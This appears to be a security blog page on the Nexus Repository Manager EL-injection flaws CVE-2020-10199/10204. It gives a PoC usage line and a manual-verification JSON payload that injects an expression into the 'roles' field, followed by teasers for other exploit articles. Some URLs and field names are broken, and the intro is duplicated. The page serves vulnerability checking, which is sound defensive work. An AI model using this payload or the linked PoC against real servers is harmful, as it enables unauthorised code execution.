Exploits

Nexus Repository Manager CVE-2020-10199/10204

Nexus Repository Manager OSS/Pro: <=3.21.1 Nexus Repository Manager 3.21.1 http/s:/help.sonatype.com/repomanager3/download/ Nexus POCE Exploit https//github.com/wsfengfan/CVE-2020-10199-10204 Usage:python3 poc.py -i 127.0.0.1 -p 8081 -c cookie -csrf csrf-token 1), CVE-2020-10204 Manual verification

Nexus Repository Manager OSS/Pro: <=3.21.1

Nexus Repository Manager 3.21.1
http/s:/help.sonatype.com/repomanager3/download/

Nexus POCE Exploit
https//github.com/wsfengfan/CVE-2020-10199-10204

Usage:python3 poc.py -i 127.0.0.1 -p 8081 -c cookie -csrf csrf-token

1), CVE-2020-10204

Manual verification is as follows:
Under http: // domain name: port / service / extdirecturl, replace the POST message body with the following attack payload. If the response packet returns “roles” value “this is vulnerability”, it proves that the system has a vulnerability.

Attack payload:
{"action":"coreui_User","method":"update","data":[{"userId":"test","version":"1.0","firstNa me":"xxx","lastName":"xxx","email":"test@qq.com","status":"active","roles":["$+{'this is vulnerability'.toUpperCase()}"]}],"type":"rpc","tid":7}

Reference:
https://www.cnblogs.com/magic-zero/p/12641068.html
https://securitylab.github.com/advisories/GHSL-2020-011-nxrm-sonatype

Was this article helpful?

If something here is wrong or out of date, tell us and we will check the source.

Related reading

See all
BugBounty

HExHTTP – HTTP Header Exploitation Tool

HExHTTP is a tool designed to perform tests on HTTP headers and analyze the results to identify vulnerabilities and interesting behaviors. Features Server Error response checking Localhost header response analysis Vhosts checking Methods response analysis HTTP Version analysis [Experimental] Cache P

January 28, 2025
Exploits

Xzbot: Exploit Demo for the xz backdoor (CVE-2024-3094)

Exploration of the xz backdoor (CVE-2024-3094). Includes the following: honeypot: fake vulnerable server to detect exploit attempts ed448 patch: patch liblzma.so to use our own ED448 public key backdoor format: format of the backdoor payload backdoor demo: cli to trigger the RCE assuming knowledge o

April 1, 2024
Exploits

Exploit Released for VMware Aria Operations for Networks RCE (CVE-2023-20887) Bug

A group of researchers has unveiled a proof-of-concept (PoC) demonstration for a serious Remote Code Execution (RCE) vulnerability present in VMware’s Aria Operations for Networks. This software suite is commonly utilized by large-scale networks, making the potential impact of this vulnerability qui

June 14, 2023
Exploits

HiveNightmare aka CVE-2021–36934

A zero-day exploit for HiveNightmare, which allows you to retrieve all registry hives in Windows 10 as a non-administrator user. For example, this includes hashes in SAM, which can be used to execute code as SYSTEM. How does this work? The permissions on key registry hives are set to allow all non-a

July 21, 2021